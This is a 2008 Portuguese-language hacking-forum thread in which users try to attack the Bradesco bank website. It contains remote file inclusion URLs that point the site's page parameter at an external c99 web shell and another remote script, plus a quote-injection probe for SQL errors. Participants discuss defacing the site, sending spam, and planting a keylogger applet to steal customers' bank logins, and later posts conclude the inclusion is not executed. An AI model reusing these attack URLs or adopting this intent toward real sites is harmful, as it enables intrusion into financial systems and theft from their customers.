FORUM DARKERS

Segurança & Hacking => Bugs | Exploits | Vulnerabilidades => Topic started by: vaikarai on 26 de June , 2008, 05:01:01 PM

Title: Bradesco vul? :P
Post by: vaikarai on 26 de June , 2008, 05:01:01 PM
http://www.bradesco.com.br/indexpf.phtm ... om/c99.txt (http://www.bradesco.com.br/indexpf.phtml?pag=http://www.evilc0der.com/c99.txt)?
:/
Title: Re: Bradesco vul? :P
Post by: vaikarai on 26 de June , 2008, 05:04:22 PM
Melhor fazer spam ou um deface?
http://www.bradesco.com.br/indexpf.phtm ... config.php (http://www.bradesco.com.br/indexpf.phtml?pag=http://wow.runic.co.kr/bbs/config.php)?
vaikarai info
Hacker banker
Title: Re: Bradesco vul? :P
Post by: vaikarai on 26 de June , 2008, 05:06:00 PM
desculpe tive que apagar pq o deface vai ser meu xD
Title: Re: Bradesco vul? :P
Post by: Wuefez on 26 de June , 2008, 05:18:00 PM
Exatamente como eu tinha dito no outro topico, o Bradesco é vulnzão sim...

Mas caso você não tenha percebido lol, o script não chega a ser processado pelo server deles:
<frame src="http://www.evilc0der.com/c99.txt?" name="conteudo" id="conteudo" frameborder="0" scrolling="auto" noresize marginwidth="0" marginheight="0">
HEHEHHEHEH
Title: Re: Bradesco vul? :P
Post by: Ilmo. Sr. JulianoRossi on 26 de June , 2008, 05:22:49 PM
Eita, pô!!

Hauhauhauhauhauhauhauhau
E eu aqui pensando que meu banco era seguro...
... deu até vergonha agora. hauhauhauhauhauhauhau

Abraços.
Title: Re: Bradesco vul? :P
Post by: vaikarai on 26 de June , 2008, 05:29:36 PM
Quote from: "Wuefez"Exatamente como eu tinha dito no outro topico, o Bradesco é vulnzão sim...

Mas caso você não tenha percebido lol, o script não chega a ser processado pelo server deles:
<frame src="http://www.evilc0der.com/c99.txt?" name="conteudo" id="conteudo" frameborder="0" scrolling="auto" noresize marginwidth="0" marginheight="0">
HEHEHHEHEH


E isso eu reparei agora.. mais os adiministrador do banco era pra ter mais responsabilidade  pq caso um site desse seja invadido o hacker mal intencionado   pode por um auto infect na tela principal e infectar varios cliente e com isso tendo acesso as conta bancrias...
Title: Re: Bradesco vul? :P
Post by: vaikarai on 26 de June , 2008, 05:39:24 PM
Erro

http://institucional.bradesco.com.br/Ne ... t.aspx?h=' (http://institucional.bradesco.com.br/NetRedeAtendimento/site/content/agencia/default.aspx?h=')\\
Title: Re: Bradesco vul? :P
Post by: Mateus on 26 de June , 2008, 05:46:24 PM
para o bem de todos e felicidade geral da nação, por favor quando mandar os links mande através de um webproxy, tipo assim

http://250.eu/surf.php?q=aHR0cDovL2luc3 ... %3D&hl=3ed (http://250.eu/surf.php?q=aHR0cDovL2luc3RpdHVjaW9uYWwuYnJhZGVzY28uY29tLmJyL05ldFJlZGVBdGVuZGltZW50by9zaXRlL2NvbnRlbnQvYWdlbmNpYS9kZWZhdWx0LmFzcHg%2FaD0lMjdcXA%3D%3D&hl=3ed)
Title: Re: Bradesco vul? :P
Post by: psycho on 26 de June , 2008, 05:54:16 PM
Consertaram né?!
Com uma falha dessa
entrando no servidor
era só colocar em applet
plugin do keylogger e
fazer a festa
Title: Re: Bradesco vul? :P
Post by: ÐλяkFeλя on 26 de June , 2008, 05:55:11 PM
Eita nos, nao estamos tento banco seguro mais nao :o
Title: Re: Bradesco vul? :P
Post by: Wuefez on 26 de June , 2008, 05:56:40 PM
Quote from: "vaikarai"Erro

http://institucional.bradesco.com.br/Ne ... t.aspx?h=' (http://institucional.bradesco.com.br/NetRedeAtendimento/site/content/agencia/default.aspx?h=')\\
O script do cara converte a string pra numero (int) antes de jogar na consulta ao banco de dados...

Como a conversão não funciona, ele joga esse erro e mata o script a partir desse ponto...
Title: Re: Bradesco vul? :P
Post by: psycho on 26 de June , 2008, 06:08:42 PM
Bora fazer alguma coisa nessa falha ae  ;)
Title: Re: Bradesco vul? :P
Post by: #phobia on 26 de June , 2008, 06:28:54 PM
lol mesmo! rsrs

PenTest nos bancos agora? ^^

Lamentável isso...
Um "profissional" responsável pela segurança de sites bancário deixando falhas como essas...
A da caixa nem se comenta, já virou festa!  o/


Tsc tsc...
Title: Re: Bradesco vul? :P
Post by: kOrTcX on 26 de June , 2008, 06:30:13 PM
Quote from: "psycho"Bora fazer alguma coisa nessa falha ae  ;)

Como foi dito o servidor não está processando \o/
Title: Re: Bradesco vul? :P
Post by: BiLL on 26 de June , 2008, 06:39:13 PM
Quote from: "psycho"Bora fazer alguma coisa nessa falha ae  :P

mais tipo assim se ninguem mais souber dessa falha, mais somente o DK isso sera muito bom pra nossa reputaçao lol

Quote from: "kortcx"Como foi dito o servidor não está processando \o/

sera q naum tem como fazer ele processar naum?
Title: Re: Bradesco vul? :P
Post by: ÐλяkFeλя on 26 de June , 2008, 06:43:22 PM
Olha gostei dessa ideia de pedi patrocinio para o DK...haushaushaush....que pena o servidor nao esta processando  :'(
Title: Re: Bradesco vul? :P
Post by: psycho on 26 de June , 2008, 06:51:16 PM
QuoteComo foi dito o servidor não está processando \o/

Realmente, Pelo motivo de redirecionar para enviador
de spam pensei que estava processando, Mais depois
vi que não está... Então não é nenhuma falha hehe
Title: Re: Bradesco vul? :P
Post by: Wuefez on 26 de June , 2008, 06:52:18 PM
Que falha?

Eles não dão a minima pra esse tipo de "falha".
Title: Re: Bradesco vul? :P
Post by: saint on 26 de June , 2008, 10:04:10 PM
acabei de abrir uma conta.............e o banco tem uma falha dessa..........
Onde vamos parar